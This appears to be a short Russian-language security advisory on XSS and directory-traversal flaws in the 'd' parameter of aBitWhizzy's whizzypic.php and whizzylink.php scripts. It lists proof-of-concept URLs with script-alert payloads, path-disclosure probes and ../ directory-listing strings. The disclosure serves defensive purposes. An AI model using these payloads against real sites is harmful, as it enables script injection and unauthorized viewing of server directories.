Хакер #305. Многошаговые SQL-инъекции
Программа: aBitWhizzy
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
1) Уязвимость существует из-за недостаточной обработки входных данных в параметре «d» сценариями whizzypic.php и whizzery/whizzypic.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=/../../../../../../../Documents%20and%20Settings"><SCRIPT>alert('XSS')</SCRIPT>
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=/../../../../../../../Documents%20and%20Settings"><SCRIPT>alert('XSS')</SCRIPT>
http://localhost/abitwhizzy/whizzypic.php?d=../../../../../../../Documents%20and%20Settings"><SCRIPT>alert('XSS')</SCRIPT>
http://localhost/abitwhizzy/whizzylink.php?d=../../../../../../../Documents%20and%20Settings"><SCRIPT>alert('XSS')</SCRIPT>
2) Уязвимость существует из-за недостаточной обработки входных данных в параметре «d» сценариями whizzylink.php, whizzery/whizzylink.php, whizzypic.php и
whizzery/whizzypic.php. Атакующий может выполнить атаки обхода директорий, что позволит ему просмотреть содержимое произвольных директорий на целевой системе.
Примеры:
Раскрытие пути:
http://localhost/abitwhizzy/whizzylink.php?d='
http://localhost/abitwhizzy/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzylink.php?d='
Перечисление директорий:
http://localhost/abitwhizzy/whizzylink.php?d=../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzypic.php?d=../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=/../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=/../../../../../../../Documents%20and%20Settings